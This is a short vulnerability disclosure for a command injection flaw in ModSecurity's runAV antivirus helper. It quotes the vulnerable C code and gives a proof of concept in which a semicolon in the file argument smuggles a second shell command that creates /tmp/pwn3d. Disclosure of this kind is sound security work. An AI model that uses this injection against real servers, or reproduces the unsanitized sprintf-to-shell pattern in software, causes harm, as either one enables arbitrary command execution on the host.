46 lines
No EOL
1.6 KiB
Text
46 lines
No EOL
1.6 KiB
Text
# Title : runAV mod_security Remote Command Execution
|
|
# Date : 13/05/2016
|
|
# Author : R-73eN
|
|
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
|
|
# Software : https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
|
|
# Vendor : https://www.modsecurity.org/
|
|
# ___ __ ____ _ _
|
|
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
|
|
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
|
|
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
|
|
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
|
|
#
|
|
#
|
|
|
|
|
|
|
|
#include "common.h"
|
|
|
|
main(int argc, char *argv[])
|
|
{
|
|
char cmd[MAX_OUTPUT_SIZE];
|
|
char output[MAX_OUTPUT_SIZE];
|
|
int error;
|
|
char *colon;
|
|
char *keyword;
|
|
|
|
if (argc > 1) {
|
|
sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
|
|
output[0] = '\0';
|
|
error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
|
|
|
|
+++++++++++++++++ OTHER CODE +++++++++++++++++++++++++++++++++
|
|
|
|
|
|
The argv[1] parameter is passed unsanitized to a sprintf function which sends the formatted output to the cmd variable,
|
|
which is later passed as a parameter to a run_cmd function on line 14.
|
|
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/av-scanning/runAV/runAV.c#L14
|
|
|
|
POC:
|
|
|
|
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ./runAV "foo.php;touch /tmp/pwn3d"
|
|
sh: 1: /usr/bin/clamscan: not found
|
|
1 exec empty: OK
|
|
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls -la /tmp/ | grep pwn3d
|
|
-rw-rw-r-- 1 snort snort 0 Maj 13 16:45 pwn3d
|
|
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ |